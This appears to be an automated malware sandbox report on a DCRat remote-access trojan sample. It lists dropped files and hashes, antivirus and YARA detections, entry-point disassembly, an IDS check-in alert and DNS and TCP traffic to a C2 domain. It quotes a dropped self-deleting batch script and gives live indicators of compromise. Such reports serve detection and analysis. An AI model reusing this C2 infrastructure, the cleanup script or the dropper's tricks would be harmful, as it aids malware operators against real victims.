CLOUDFLARENETUS | https://www.evernote.com/shard/s371/sh/f041cc04-2eb8-11e1-1279-c0c24914207a/LWhD3rgdQ5xR5t--iDOJ7P-MUkYVUhgRq62dC8LVzLZOnctWRKJm5hEzqg | malicious | HTMLPhisher | 1.1.1.1
CLOUDFLARENETUS | GA4vpVYBVP.exe | malicious | DBatLoader, FormBook | 172.67.145.203
CLOUDFLARENETUS | RR1h1iO6W2.exe | malicious | FormBook | 188.114.97.3
                    No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Desktop\gOvRVAND.log | Vg46FzGtNo.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\gOvRVAND.log | hZE4solQRQ.exe | malicious | DCRat
C:\Users\user\Desktop\gOvRVAND.log | AK4VPeDc0M.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\gOvRVAND.log | 6Z4Q4bREii.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\gOvRVAND.log | a6zbacl43h.exe | malicious | DCRat
C:\Users\user\Desktop\gOvRVAND.log | BbaXbvOA7D.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\gOvRVAND.log | cL7A9wGE3w.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\gOvRVAND.log | j05KsN2280.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\gOvRVAND.log | 2lR1Spui9w.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\gOvRVAND.log | b8khu7cOny.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\AppData\Roaming\ms_tool.exe | standlose plus.exe | malicious | DCRat
C:\Users\user\AppData\Roaming\ms_tool.exe | 6lmWSYhtHT.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\AppData\Roaming\ms_tool.exe | GlhUEXoa8D.exe | malicious | DCRat, PureLog Stealer
C:\Users\user\AppData\Roaming\ms_tool.exe | 47VcV3MNuc.exe | malicious | DCRat
C:\Users\user\AppData\Roaming\ms_tool.exe | 8JUrnD9NeY.exe | malicious | DCRat
C:\Users\user\AppData\Roaming\ms_tool.exe | SL3qvfqA8t.exe | malicious | DCRat
                                                    Process:C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):1740
                                                    Entropy (8bit):5.36827240602657
                                                    Encrypted:false
                                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKk+HKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKk+qZ4vtpv
                                                    MD5:1152A0332636E97D888ECFF02C1B19A9
                                                    SHA1:365D4052647A8B9BCC0512CBCFB12279316549FD
                                                    SHA-256:C72695BD822EB0EB112850B84D7ABBD5BADF07C3A0A670422D9DA3620BAE6EB4
                                                    SHA-512:9FFC281DBF24C21DDEC4BE93941339B7601AD12C24D11176668DBDFD0AD5826FDA463620BF9E129030D9119BF9A9E21C45A999F31249AA9BD65B85546783AD28
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                    Process:C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):4.4838561897747224
                                                    Encrypted:false
                                                    SSDEEP:3:GxC3GLIbVTn:GxCsyTn
                                                    MD5:A795B06925AF161176CDEF580E5FA14B
                                                    SHA1:84EABE55FBF43684747F8E2027B3EA377BBC7ACC
                                                    SHA-256:685D6D937BE665F7E526EB51684F33CC7B0950B8B7E2683BCE4CB7D39DECFFC3
                                                    SHA-512:03E0E2D15D91AF5380183E0917F7B2ED7690EFE6C30D9E86C40BA648BE16DDDF8CC30DD3911D12BE93E117974602FE387BDA086060E7E96F29198591A1D6CC00
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:DfNUvaZEhgV5CcnmAdRNKxcY6
                                                    Process:C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):225
                                                    Entropy (8bit):5.058654544935388
                                                    Encrypted:false
                                                    SSDEEP:6:hCijTg3Nou1ShCZG1wknaZ54hKOZG1wkn23fZh:HTg9uyrHgf3
                                                    MD5:EDDB6633A7759841AF7FDB6EB30A0814
                                                    SHA1:CB8BEEB56E2DFE3E2081E21E1C6A3F2FEF69536E
                                                    SHA-256:7194CA4622E5A75CA2CEE06C7C55BE52AA674734B8D583B98273E5745B7F0721
                                                    SHA-512:0BBFEB843BEF1AEF04F6C23BC569CAC1F9DA6B55B5963354C502951053F41CA0AD8B46D07D09BE16BC8A47356AF8E0FF37D97C237104761C2AB3E6AE865FD51A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Reputation:low
                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..del /a /q /f "C:\Users\user\AppData\Roaming\ms_updater.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\jClCs9nEU3.bat"
                                                    Process:C:\Users\user\Desktop\1hibLFnCm1.exe
                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):18944
                                                    Entropy (8bit):5.181595394449682
                                                    Encrypted:false
                                                    SSDEEP:384:abquDyuX3PMD1A77ciNqC/Elsrl+0+/QlDIINvB0WLFW:gquuuHPMDinDY9al+0WQFNvBZ
                                                    MD5:F3EDFF85DE5FD002692D54A04BCB1C09
                                                    SHA1:4C844C5B0EE7CB230C9C28290D079143E00CB216
                                                    SHA-256:CAF29650446DB3842E1C1E8E5E1BAFADAF90FC82C5C37B9E2C75A089B7476131
                                                    SHA-512:531D920E2567F58E8169AFC786637C1A0F7B9B5C27B27B5F0EDDBFC3E00CECD7BEA597E34061D836647C5F8C7757F2FE02952A9793344E21B39DDD4BF7985F9D
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: standlose plus.exe, Detection: malicious
                                                    • Filename: 6lmWSYhtHT.exe, Detection: malicious
                                                    • Filename: GlhUEXoa8D.exe, Detection: malicious
                                                    • Filename: 47VcV3MNuc.exe, Detection: malicious
                                                    • Filename: 8JUrnD9NeY.exe, Detection: malicious
                                                    • Filename: SL3qvfqA8t.exe, Detection: malicious
                                                    Reputation:low
                                                    Process:C:\Users\user\Desktop\1hibLFnCm1.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):640512
                                                    Entropy (8bit):5.689710256126498
                                                    Encrypted:false
                                                    SSDEEP:12288:y4Tnk5JYTGS7QxJnYV7tJJMA+mEgcvJMjucBZ6:y4TnOSYYV7XJMA+byuW6
                                                    MD5:CEAC3DE237F6B1DC4B279D8E5F5B3689
                                                    SHA1:6C9C0B9031A3D136FF133B5FC72B1A1F3121E100
                                                    SHA-256:80BD7EC034AD211DC479ADCDE679F2D3EC28F478692AA84338CE057AB548E510
                                                    SHA-512:81501C9DEC1B39CFDA4FA4D8FF4573DD0BCC421272BF59955CDD7995DD8B31037FCC9D36AC9B146EE096E4687286D7590336A1F844AEB09DFA16B256BB253888
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\ms_updater.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                    Process:C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):5.932541123129161
                                                    Encrypted:false
                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Joe Sandbox View:
                                                    • Filename: Vg46FzGtNo.exe, Detection: malicious
                                                    • Filename: hZE4solQRQ.exe, Detection: malicious
                                                    • Filename: AK4VPeDc0M.exe, Detection: malicious
                                                    • Filename: 6Z4Q4bREii.exe, Detection: malicious
                                                    • Filename: a6zbacl43h.exe, Detection: malicious
                                                    • Filename: BbaXbvOA7D.exe, Detection: malicious
                                                    • Filename: cL7A9wGE3w.exe, Detection: malicious
                                                    • Filename: j05KsN2280.exe, Detection: malicious
                                                    • Filename: 2lR1Spui9w.exe, Detection: malicious
                                                    • Filename: b8khu7cOny.exe, Detection: malicious
                                                    Process:C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):24064
                                                    Entropy (8bit):5.4346552043530165
                                                    Encrypted:false
                                                    SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                    MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                    SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                    SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                    SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 6%
                                                    Process:C:\Windows\System32\w32tm.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):151
                                                    Entropy (8bit):4.759057333148783
                                                    Encrypted:false
                                                    SSDEEP:3:VLV993J+miJWEoJ8FXxX9RStbMGOZ8XKvobPKvj:Vx993DEU2tRCMGE8F7s
                                                    MD5:2E35F958FD06F112889CDF43279294AA
                                                    SHA1:73FD07F58A1007EBBF3E724D9CB13116E426CB66
                                                    SHA-256:40B3463A2FBC241489DE4B54AC91BB631580CA742E0E2D37C2FABC304CE77CFB
                                                    SHA-512:C3793964D15E5B2D66E42C72BF2092D7930C8A62EEF7E6F86A2162AF03C8606E1A7E5D0DAB3C457A5C4FBB02F8642E1C11FC89A37D12273B4028B571C53C02F8
                                                    Malicious:false
                                                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 03/07/2024 11:32:02..11:32:02, error: 0x80072746.11:32:07, error: 0x80072746.
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.813048403740222
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:1hibLFnCm1.exe
                                                    File size:906'240 bytes
                                                    MD5:2196edd4ad9d7e8ca345339a66e2fed5
                                                    SHA1:d604a25d04700d19896c1dfe12586568fae5c32f
                                                    SHA256:90a9d213bced2844dbf8a635244a85f29fa5af2c439ca7782709b1ebe304734a
                                                    SHA512:73dae769c4f6aff412d7da1241fc2259a28f1be667239a926c304f0e13bf30f1f9e0ec76e09e914afc7ef520ee2656b9cfe7ac5670be78e148571cdeedcf6fef
                                                    SSDEEP:24576:SrSvamteGeyJhlvWr6ZPk9DXlEqSdVnhU2EaPM:LvaQNJhBQXlEPhY
                                                    TLSH:CE15021038D1C472E463253708E5DB7EA97EB9201B2699EF67D80F7E8F602C1D63196B
                                                    Icon Hash:90cececece8e8eb0
                                                    Entrypoint:0x40afe6
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66796FE3 [Mon Jun 24 13:08:51 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:a19e926f66227883d74cdde041d55af8
                                                    Instruction
                                                    call 00007FA52C7DDCEBh
                                                    jmp 00007FA52C7DD279h
                                                    cmp ecx, dword ptr [004390F0h]
                                                    jne 00007FA52C7DD403h
                                                    ret
                                                    jmp 00007FA52C7DE034h
                                                    call 00007FA52C7DD427h
                                                    push 00000000h
                                                    call 00007FA52C7DD6BDh
                                                    pop ecx
                                                    test al, al
                                                    je 00007FA52C7DD410h
                                                    push 0040B0A7h
                                                    call 00007FA52C7DD83Bh
                                                    pop ecx
                                                    xor eax, eax
                                                    ret
                                                    push 00000007h
                                                    call 00007FA52C7DDD72h
                                                    int3
                                                    push esi
                                                    push edi
                                                    push 00000FA0h
                                                    push 0043B564h
                                                    call dword ptr [0042A0A8h]
                                                    push 0042B2C0h
                                                    call dword ptr [0042A098h]
                                                    mov esi, eax
                                                    test esi, esi
                                                    jne 00007FA52C7DD413h
                                                    push 0042B1B0h
                                                    call dword ptr [0042A098h]
                                                    mov esi, eax
                                                    test esi, esi
                                                    je 00007FA52C7DD448h
                                                    push 0042B304h
                                                    push esi
                                                    call dword ptr [0042A09Ch]
                                                    push 0042B320h
                                                    push esi
                                                    mov edi, eax
                                                    call dword ptr [0042A09Ch]
                                                    test edi, edi
                                                    je 00007FA52C7DD414h
                                                    test eax, eax
                                                    je 00007FA52C7DD410h
                                                    mov dword ptr [0043B57Ch], edi
                                                    mov dword ptr [0043B580h], eax
                                                    pop edi
                                                    pop esi
                                                    ret
                                                    xor eax, eax
                                                    push eax
                                                    push eax
                                                    push 00000001h
                                                    push eax
                                                    call dword ptr [0042A0B4h]
                                                    mov dword ptr [0043B560h], eax
                                                    test eax, eax
                                                    jne 00007FA52C7DD3E9h
                                                    push 00000007h
                                                    call 00007FA52C7DDCF0h
                                                    int3
                                                    push 0043B564h
                                                    call dword ptr [00000000h]
                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x384d8 | 0x3c | .rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xdf000 | 0x22cc | .reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x359e0 | 0x1c | .rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x35a00 | 0x18 | .rdata
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35920 | 0x40 | .rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2a000 | 0x194 | .rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                    .text | 0x1000 | 0x28624 | 0x28800 | b79b2967169a57e5028b529684b3a809 | False | 0.5810546875 | data | 6.67439707769049 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata | 0x2a000 | 0xee50 | 0xf000 | 24d43e26b25d45b4631cea07d7edce5a | False | 0.5040852864583333 | data | 5.425027509027553 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data | 0x39000 | 0x30b8 | 0x2200 | 965d6c26d3b76e34c9475ea4d7b074f8 | False | 0.18278952205882354 | data | 4.364199987344561 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .cSs | 0x3d000 | 0xa1048 | 0xa1200 | 01ae398439bf4256266bb8f576d9fca0 | False | 0.9997302899534523 | data | 7.9996402860929505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .reloc | 0xdf000 | 0x22cc | 0x2400 | 30e9b8aec64eccd34c91b4272f38c4f5 | False | 0.7211371527777778 | data | 6.466403740176183 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    DLL | Import
                                                    ole32.dll | CoGetObjectContext, CoGetApartmentType
                                                    KERNEL32.dll | SetEndOfFile, HeapSize, WaitForSingleObject, LoadLibraryW, CreateThread, RaiseException, GetCurrentThreadId, IsProcessorFeaturePresent, GetLastError, FreeLibraryWhenCallbackReturns, CreateThreadpoolWork, SubmitThreadpoolWork, CloseThreadpoolWork, GetModuleHandleExW, MultiByteToWideChar, InitializeConditionVariable, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableSRW, InitOnceComplete, InitOnceBeginInitialize, GetStringTypeW, InitializeSRWLock, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, WideCharToMultiByte, CloseHandle, WaitForSingleObjectEx, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, WriteConsoleW, GetCPInfo, InitializeCriticalSectionAndSpinCount, SetEvent, ResetEvent, CreateEventW, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, ReadConsoleW, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetConsoleOutputCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, CreateFileW
                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                    07/03/24-15:52:06.253098 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49730 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Jul 3, 2024 15:52:06.247704983 CEST | 49730 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:06.252676964 CEST | 80 | 49730 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:06.252785921 CEST | 49730 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:06.253098011 CEST | 49730 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:06.257894993 CEST | 80 | 49730 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:06.608555079 CEST | 49730 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:06.824548006 CEST | 80 | 49730 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:06.825920105 CEST | 80 | 49730 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:06.873346090 CEST | 49730 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:07.419704914 CEST | 80 | 49730 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:07.419821978 CEST | 80 | 49730 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:07.419992924 CEST | 49730 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:07.447504044 CEST | 49730 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:07.452497005 CEST | 80 | 49730 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:07.552268028 CEST | 80 | 49730 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:07.552495003 CEST | 49730 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:07.560182095 CEST | 80 | 49730 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:07.848247051 CEST | 80 | 49730 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:07.888962984 CEST | 49730 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.236958981 CEST | 49730 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.238588095 CEST | 49731 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.240210056 CEST | 49732 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.242331028 CEST | 80 | 49730 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:08.242408991 CEST | 49730 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.243484020 CEST | 80 | 49731 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:08.243566990 CEST | 49731 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.243691921 CEST | 49731 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.245035887 CEST | 80 | 49732 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:08.245106936 CEST | 49732 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.245197058 CEST | 49732 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.248446941 CEST | 80 | 49731 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:08.250224113 CEST | 80 | 49732 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:08.592111111 CEST | 49732 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.592216015 CEST | 49731 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.597208023 CEST | 80 | 49732 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:08.597225904 CEST | 80 | 49731 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:08.597285032 CEST | 80 | 49731 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:08.691548109 CEST | 80 | 49732 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:08.710963011 CEST | 80 | 49731 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:08.748214006 CEST | 49732 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.765732050 CEST | 49731 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.977560997 CEST | 49735 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.982760906 CEST | 80 | 49735 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:08.982836962 CEST | 49735 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.983047962 CEST | 49735 | 80 | 192.168.2.4 | 104.21.90.190
                                                    Jul 3, 2024 15:52:08.988084078 CEST | 80 | 49735 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:09.044270039 CEST | 80 | 49732 | 104.21.90.190 | 192.168.2.4
                                                    Jul 3, 2024 15:52:09.081466913 CEST8049731104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:09.088802099 CEST4973580192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.091959000 CEST4973280192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.123503923 CEST4973180192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.138557911 CEST8049735104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:09.190867901 CEST4973280192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.192212105 CEST4973680192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.197024107 CEST8049732104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:09.197082996 CEST4973280192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.197189093 CEST8049736104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:09.197253942 CEST4973680192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.197371960 CEST4973680192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.202219009 CEST8049736104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:09.363048077 CEST8049735104.21.90.190192.168.2.4
                                                    Jul 3, 2024 15:52:09.363112926 CEST4973580192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.538980007 CEST4973180192.168.2.4104.21.90.190
                                                    Jul 3, 2024 15:52:09.539022923 CEST4973680192.168.2.4104.21.90.190
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 3, 2024 15:52:05.394722939 CEST | 51545 | 53 | 192.168.2.4 | 1.1.1.1
Jul 3, 2024 15:52:06.240715027 CEST | 53 | 51545 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 3, 2024 15:52:05.394722939 CEST | 192.168.2.4 | 1.1.1.1 | 0x8edc | Standard query (0) | 118621cm.n9shteam2.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 3, 2024 15:52:06.240715027 CEST | 1.1.1.1 | 192.168.2.4 | 0x8edc | No error (0) | 118621cm.n9shteam2.top | (none) | 104.21.90.190 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 15:52:06.240715027 CEST | 1.1.1.1 | 192.168.2.4 | 0x8edc | No error (0) | 118621cm.n9shteam2.top | (none) | 172.67.159.202 | A (IP address) | IN (0x0001) | false
                                                    • 118621cm.n9shteam2.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.21.90.190 | 80 | 6768 | C:\Users\user\AppData\Roaming\ms_updater.exe

Timestamp | Bytes transferred | Direction | Data
